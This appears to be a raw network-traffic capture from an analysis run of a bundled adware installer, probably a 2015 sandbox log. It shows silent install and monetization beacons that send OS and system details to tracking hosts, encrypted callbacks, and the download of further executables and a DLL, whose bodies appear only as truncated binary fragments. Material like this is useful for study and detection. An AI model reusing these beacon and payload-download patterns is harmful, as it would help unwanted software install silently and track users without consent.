x-amz-id-2: msaoVdWRjmprlinZ3sIdFtrM  O57Tfufft1yyjbdn6CUV21OOsmG0A/5zZV/cJ7

x-amz-request-id: A4F6FD96F965B539

Date: Tue, 08 Sep 2015 06:55:17 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 12:50:55 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: msaoVd
WRjmprlinZ3sIdFtrM  O57Tfufft1yyjbdn6CUV21OOsmG0A/5zZV/cJ7..x-amz-requ
est-id: A4F6FD96F965B539..Date: Tue, 08 Sep 2015 06:55:17 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Sun, 02 Aug 2015 12:50:55 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /apps.gif?action=install&app=70881&appver=&ver=1_36_01_22&version_date=15-09-08&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=7064429D9C88417885E6E9F5385B8646PI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGOFV6b2JyZGMxLDk5OTk5OTk5LTk5OTktNDE5YS04MWVmLWY2ZDZkZDU3MDgxYywiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTQxOWEtODFlZi1mNmQ2ZGQ1NzA4MWMifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&installtime=1441695305&lifetime=0&silent=1&crtnm=na&procstarttime=1441695305&procruntime=15&rnd=1441695320 HTTP/1.1

Host: stats.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: h9uOx3VJRK9oA8vdc4tM8/oViLmkL8eypmuvA9mygQNRmIyvLW9FnJaLEkQc2cDU

x-amz-request-id: 9F97558675835E1D

Date: Tue, 08 Sep 2015 06:55:18 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 12:50:44 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: h9uOx3
VJRK9oA8vdc4tM8/oViLmkL8eypmuvA9mygQNRmIyvLW9FnJaLEkQc2cDU..x-amz-requ
est-id: 9F97558675835E1D..Date: Tue, 08 Sep 2015 06:55:18 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Sun, 02 Aug 2015 12:50:44 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;..

GET /app/ping.ashx?action=S_INSTALL&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-419a-81ef-f6d6dd57081c,&rnd=21214&v=1.0.8654.1204&url=&title=&pingtext=Files& protocol=&size=0&ref=&browser= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: VVV.ytdownloader.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 0

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 08 Sep 2015 06:54:57 GMT

HTTP/1.1 200 OK..Cache-Control: private..Content-Length: 0..Server: Mi
crosoft-IIS/7.5..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..D
ate: Tue, 08 Sep 2015 06:54:57 GMT..

GET /web/gf/all/setup.exe_d HTTP/1.1

Host: dl.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:55 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441676848"

Last-Modified: Tue, 08 Sep 2015 01:47:28 GMT

Cache-Control: max-age=3447

Content-Length: 2056891

Content-Type: text/plain

X-HW: 1441695295.dop007.fr7.t,1441695295.cds019.fr7.c
.2..4.E.V..IDq........Z.... ..!..c.4r......H.T...B....W}..H..H-u.p:..5
&.....$.Q.6'....He..R.m.'[email protected]..{|[email protected]
-?.B..[..:.w..".%....I.,..G...u [email protected].,...;..,.Q{...X...L........
*...y8/..WUV..\.. ..Z./..W$....3....V3YE...e ......4......`.5.3:P. ..m
/../.....o.R..... .:^H.f..Mc...q..~..u...o.W....%......Pv..J.d..P.oX.\
.....k0..r ;.......;')......~.%.Q..][......P.VQ.)..s.#(..g.`...8k..e.I
.tp..C...{.. [email protected]|...K..j....{.
..y...Ad.v.."E{.?j.M..C<....\.....v....<......L...rn..Tc`...N..)
!.Lz..c.....sq.P..v..n>".h..bMG.*-..\k.... .]?.....o.<.j?...a...
.......4U...^../....bc...L.t.v._.RM7..I..~.9...o.;VK.......Op?4^...;..
D......eH.,... ...@ r.p....H....d...u....._.......P..2..H.........7.6&
%C.....k..)*.Y3T.]Rc...{ ..8#1..u..l.E..q..4'....U.....N......\.......
.`.}.Yh!8`J..~.EY.r.....h..3E.....Y.#..... .G.... .zW.J.&.VX-].B..6..Q
..4'm...F.Q.%.}0.&...R.w..2m&l..9t6......#.X.K.e.."....`U......V..^..}
E...?.D..z..........x.. *.Q.......4E....!...`.>|;.2t.5x........S...
*........S5 .......ZE..s...O....\....=........z.6..}.[!.y.>.U..R..j
$....g........F.....0~.>dn/.H..L..H.8iK..6.#[email protected]}T.xH.I %
...r6......3&|...p.|..Xe..O.~Q5.ED...Z.........1...R...4....f...I.Or'.
.W.....*T.(..n....U...9.lm.5L ..O..zJ7..<..T0...a.7...i.......$/&.`
.Z.v.*.M...B....#....2!Q4k>.G....^iP......$.4.._F..d..Q..B...P..q.I
cU.......?.."..o.f..~......4..`....kb......,....7. ;T.A.m....K>.CA.
=O...r......0.(...9...4...n..X.R.........)j.....aAS...x-.6..T.yEh.<<< skipped >>>

GET /bxsdk32.dll HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dyd9qf154h76q.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 942080

Connection: keep-alive

Date: Mon, 17 Aug 2015 04:34:01 GMT

Last-Modified: Tue, 25 Nov 2014 14:05:45 GMT

ETag: "05c47da12b0009bd98653f51287f7768"

Accept-Ranges: bytes

Server: AmazonS3

Age: 649

X-Cache: Hit from cloudfront

Via: 1.1 b56fc979704f01acc351fd21f5c956db.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 86n4k8hZyl9tKHj_2-Z4WDBtg08w5szLt7hSlGdOD5BDoU1CA3qleg==

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......gu..#...#...
#.......!...........#...........I......."......."......."...Rich#.....
......................PE..L...9.dT...........!................P.......
.................................`....................................
..............................................tn..@...................
................................8............................text...O.
.......................... ..`.rdata...t..........................@..@
.data...x.... ....... [email protected].........................
......@[email protected][email protected]....................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................

<<< skipped >>>

GET /monetization.gif?event=3&ibic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&campaign=001729&country=ua&app=70881&os=XP32&defbro=ie&chver=na&ffver=na&iever=&starttime=1441695305&asw=0_1073750528_-2147483648_2048&browser=&rnd=1441695305 HTTP/1.1

Host: logs.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:55:11 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1389114507"

Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT

Cache-Control: max-age=86400

Content-Length: 35

Content-Type: image/gif

X-HW: 1441695311.dop005.fr7.t,1441695311.cds001.fr7.c

GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Tue, 08 Sep 
2015 06:55:11 GMT..Keep-Alive: timeout=5, max=100..Connection: Keep-Al
ive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 
Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 3
5..Content-Type: image/gif..X-HW: 1441695311.dop005.fr7.t,1441695311.c
ds001.fr7.c..GIF89a.............,...........D..;..

GET /app/ping.ashx?action=install&userid=&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-419a-81ef-f6d6dd57081c,&v=1.0.8654.1204&url=&title=&pingtext=MjEyMTQA&protocol=&size=0&ref=&browser= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: rep.ytdownloader.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 0

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 08 Sep 2015 06:55:28 GMT
....


GET /app/ping.ashx?action=start&userid={3DDADCD7-C12E-426F-B69A-34C6CF1194AE}&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-419a-81ef-f6d6dd57081c,&v=1.0.8654.1204&url=&title=&pingtext=TWljcm9zb2Z0IFdpbmRvd3MgWFAgUHJvZmVzc2lvbmFsIFNlcnZpY2UgUGFjayAzIChidWlsZCAyNjAwKQA=&protocol=&size=0&ref=&browser= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: rep.ytdownloader.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 0

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 08 Sep 2015 06:55:28 GMT

GET /installer.gif?action=started&app=70299&appver=0&ver=1_36_01_22&version_date=15-09-08&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=4490BA80584744D2ABB64309374D51AFPI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGOFV6b2JyZGMxLDk5OTk5OTk5LTk5OTktNDE5YS04MWVmLWY2ZDZkZDU3MDgxYywiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTQxOWEtODFlZi1mNmQ2ZGQ1NzA4MWMifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_100&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&mdat=TGH9KDVOZsqytilSN62IGgYdRC8Adht035Oiv/VdBFOgbDsIW6H8ZEmIuWDuytIcxAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgJKRTYLK2GHYcH1gNxWn EAECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1441695306&procruntime=7&rnd=1441695313 HTTP/1.1

Host: stats.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: 9yna/mR58IuJLhhpL9jgG6PDVztFrdhmuyqjsUEydM1BoX5RRJFzycz03tpKnAGY

x-amz-request-id: 601E7A23E83CF9F6

Date: Tue, 08 Sep 2015 06:55:11 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 12:50:55 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 9yna/m
R58IuJLhhpL9jgG6PDVztFrdhmuyqjsUEydM1BoX5RRJFzycz03tpKnAGY..x-amz-requ
est-id: 601E7A23E83CF9F6..Date: Tue, 08 Sep 2015 06:55:11 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Sun, 02 Aug 2015 12:50:55 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /installer.gif?action=finished&LFMR=NA&app=70299&appver=&ver=1_36_01_22&version_date=15-09-08&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=4490BA80584744D2ABB64309374D51AFPI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGOFV6b2JyZGMxLDk5OTk5OTk5LTk5OTktNDE5YS04MWVmLWY2ZDZkZDU3MDgxYywiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTQxOWEtODFlZi1mNmQ2ZGQ1NzA4MWMifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_100&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1441695306&procruntime=15&rnd=1441695321 HTTP/1.1

Host: stats.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: UlhVLUYmpamyfQf6xumlpN7EZ6OAvEgleJJwwgF1Guu42Y0pQn0M/8yNy62VApUM

x-amz-request-id: AE2D95F04EBA3C18

Date: Tue, 08 Sep 2015 06:55:19 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 12:50:55 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: UlhVLU
YmpamyfQf6xumlpN7EZ6OAvEgleJJwwgF1Guu42Y0pQn0M/8yNy62VApUM..x-amz-requ
est-id: AE2D95F04EBA3C18..Date: Tue, 08 Sep 2015 06:55:19 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Sun, 02 Aug 2015 12:50:55 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /apps.gif?action=install&app=70299&appver=&ver=1_36_01_22&version_date=15-09-08&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=4490BA80584744D2ABB64309374D51AFPI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGOFV6b2JyZGMxLDk5OTk5OTk5LTk5OTktNDE5YS04MWVmLWY2ZDZkZDU3MDgxYywiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTQxOWEtODFlZi1mNmQ2ZGQ1NzA4MWMifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&installtime=1441695306&lifetime=0&silent=1&crtnm=na&procstarttime=1441695306&procruntime=15&rnd=1441695321 HTTP/1.1

Host: stats.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: pmlfIwiXSnoZ9OdAvBX1s ExH MVOgyJikNd8Wg5/CvARk3j7DcWmYgVG9x9jD93

x-amz-request-id: 2BEFB3BD578CB7E0

Date: Tue, 08 Sep 2015 06:55:19 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 12:50:44 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;..

GET /21214.ashx?e=uWabAt9SLcyBuMQa44hX0CgKFoNUu98snvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRg11yv0z2CgIWebjftHCncAtgsbAq9cfMqLQ1AVjbz2R20qHT6WNWM4V 9m YgK2IN2ZOiYEsonqrXIxNf6X/p/WdlP5RfIHxwTxIUcsgQ wrYotdzxAEMpx1QZiJL1PeP7IjMscFXrLxNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsmxP7YdWR5r9BKJkTiY0kK4D8r1cHhgWlw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:19 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21214.ashx?e=uWabAt9SLcyBuMQa44hX0CgKFoNUu98snvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRg11yv0z2CgIWebjftHCncAtgsbAq9cfMqLQ1AVjbz2R20qHT6WNWM4V 9m YgK2IN2ZOiYEsonqrXIxNf6X/p8eMZiMaXQ3mwTxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45BRPYaUlmfRdFIv0wqksZ51Sl9Z6VLx I HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:19 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21214.ashx?e=uWabAt9SLcyBuMQa44hX0CgKFoNUu98snvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRg11yv0z2CgIWebjftHCncAtgsbAq9cfMqLQ1AVjbz2R20qHT6WNWM4V 9m YgK2IN2ZOiYEsonqrXIxNf6X/p8CFMPu/XF4Lika8ANLts6Gs8HdD6KPa68kmUanERQNRTUGfFn6TH8UjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVWWV15Tzi/iXcTrLwardeWm5xtDBkuzBZw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:19 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21214.ashx?e=uWabAt9SLcyBuMQa44hX0CgKFoNUu98snvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRg11yv0z2CgIWebjftHCncAtgsbAq9cfMqLQ1AVjbz2R20qHT6WNWM4V 9m YgK2IN2ZOiYEsonqrXIxNf6X/p/ZGSjSNMjhLtXDXZHqh b9jyJC8MAmcYqh7Gcj1ILXhdtXANK2UVVldUmBhCw8CHk9G0rDhsRNGMTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rJsT 2HVkea/QSiZE4mNJCuA/K9XB4YFpc= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:20 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21214.ashx?e=uWabAt9SLcyBuMQa44hX0CgKFoNUu98snvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRg11yv0z2CgIWebjftHCncAtgsbAq9cfMqLQ1AVjbz2R20qHT6WNWM4V 9m YgK2IN2ZOiYEsonqrXIxNf6X/p p3jNnuGZ/QCM8BjoE4r5ojgb6v7cXpPtX8qMQRZgpmz/9fsKQO4 yu6aPorR5b/Qlc4m6AJLdylO8xmMRVWZOb7j5JAyiJ5DwvGnwcuiCjBHn3WtPO7TkPk55LBQN29raE2JuypHmFWVSvOHNjNGnq4HymoAeTplYsVN63O8acvsG738OKyeGhM1IhxvZTJw= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:20 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21214.ashx?e=PcwT4QFtuPDiDhjjz73apkXtTXOwAAQBsU/fGw8OkC2AMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KybE/th1ZHmv0EomROJjSQrg/US69jjK3DfkKZPeLk1IXa8iDQLHG9inCtSd9DvDByFsXwpAaO73LVAezdf3aKUUmvGwE2ItoihD9gPpiV Hiz4gguKWlYXSSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkYNdcr9M9goCFnm437Rwp3ALYLGwKvXHzIxmb7yrGl6ig== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:20 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21214.ashx?e=QgW8pN5r26ZQhScA1jb3TygKFoNUu98snvZi s3jtzEHqUQ0J3/4E35CmT3i5NSF2vIg0CxxvYpwrUnfQ7wwchbF8KQGju9y1QHs3X92ilFBkBMfD9KDE9CUHeR8YCF3WFoBNBxLOthEFwWlUecUJzgAdaVkPwOvLkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBxuiooWaRoAJw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:20 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET / HTTP/1.1

Host: ipgeoapi.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:55:09 GMT

Connection: keep-alive

Content-Type: application/json;charset=utf-8

Content-Length: 40

Server: thin 1.4.1 codename Chromeo

Via: 1.1 vegur

{"country_code":222,"country_name":"UA"}HTTP/1.1 200 OK..Date: Tue, 08
 Sep 2015 06:55:09 GMT..Connection: keep-alive..Content-Type: applicat
ion/json;charset=utf-8..Content-Length: 40..Server: thin 1.4.1 codenam
e Chromeo..Via: 1.1 vegur..{"country_code":222,"country_name":"UA"}..

GET /spdbt/shoppy/snsch7.exe_b HTTP/1.1

Host: dl.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:17:17 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441692385"

Last-Modified: Tue, 08 Sep 2015 06:06:25 GMT

Cache-Control: max-age=1342

Content-Length: 2058578

Content-Type: text/plain

X-HW: 1441695295.dop001.fr7.t,1441695295.cds028.fr7.s,1441695295.dop008.dc1.r,1441695296.cds003.dc1.c,1441695295.cds028.fr7.p
o/..W....]..$ ..g.P.o..fUl,..T..R..%(..tJ...| SwT(....-p..........2.7.
........?......wz..G(.......X9.......<...".zI...........cnm2....$.6
_..f...9. ...W.....`d.at....=Fn.k...C.......A.m...j<...c.... ......
;.a.. !.n...!.[O./L.......%.g....xx...P.Rny.....L..?..Yy.....S..^...6.
..R\..eZ.Q`KolQ.A..[pe%.Q./......?......N..........~8.....m...V$K.?...
d/.u...k6....p........!...L.m...._..Z. ..N.d.u..@G....]v.X.=?p.......N
.[..b.n.ie@[email protected]?x.....Q..&#.v18....Jx.oO..Zu^L.
`.xc...!-..7......L%D.7T..q...~]..Ep.W..#....V...^..l......H]c.g/....=
;|jv......0.......g._........7. <....?&f...*a.....s*a.sA..K...;_..L
P.YpO.....t..-!Kb..oc...2..'wj..(..r............hE..}(... ..H.A...k../
.te...f`...s.m>........ .E.(..Q\..i.=|<Q.5Bz............$yy...mC
b.v...9.>.`ku.c. T...;x.OO~....m.x.........C........q./O}..#..EBQ..
..........V.\J]....)'.W.lMg..:^ ...P..Rl...!.....5\..|.Fz..-..i0.xD...
Wy.v....- [email protected]...\..w....w.@....`..t.7^....O..06...x.r.L..R..:..}}A`.
...<{6.}....=..&.*....y....^..A.`C.....C."...m.......y.Ez.....Q...'
@gb..K"..X.0..M..O...g..ga.....iY...1T...~..V.9.rX..B.'........RQ.7s.5
.q..6....=.H.cO....5.;.X.W...... .q*F..DY..a;A..n.W.,..&......$]...Kv.
,c4~i..G..........*;...K..].G.fO!...(...$MT.Ua...7.;.9P}..w"#h8a.v.s..
.$.?.C..."..Kg.%.._.....,.f. F..a.{.*.7...F)......|......4i...THa.z..n
...H..8.'...d....dK....t....M6.....c..J. ..41.h.r@).GB.7....&...A...D.
........D....v../?........v.....7...q.\.>9....3..s.. ni.[.z.....3f"
.,tk..n.c..w........6XW.^......Kp...d.6.......#...e.?~.z._~...uM.R<<< skipped >>>

GET /21214.ashx?e=obiBp3WOda WjDTOqhvSEco8YECNv9u2N4LE12xWIbsoHZkq4q5PhSAvELRpepitqGvv5sqhroDaM1aE/ClNTTua4Maub6eC74r1XQZFERIJ5AJXlBzFu09k8ckggnu0s IILilpWF3Y9uT/0042UzB0eIArPecdjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsMss0xdmNFlbg== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:25 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21214.ashx?e=p9HAq5TtKa9F7U1zsAAEAbFP3xsPDpAtgDEcVfgp paILtUXHuyvMn5dMiu8MPG0G04r2GZQbxA4k4Gm5vvSsmxP7YdWR5r9BKJkTiY0kK4P1EuvY4ytw35CmT3i5NSF2vIg0CxxvYpwrUnfQ7wwchbF8KQGju9y1QHs3X92ilG rUXTCO4f7ymF904v4t2D1j0SFQEi Sk bZ05DPuxeAWhabtZUG1f8n8JlmuEfM5AjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3UlF4mqrDXF/v6HzWHDR5YBjz 1atQERUHYGhmNDoUgj HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:25 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

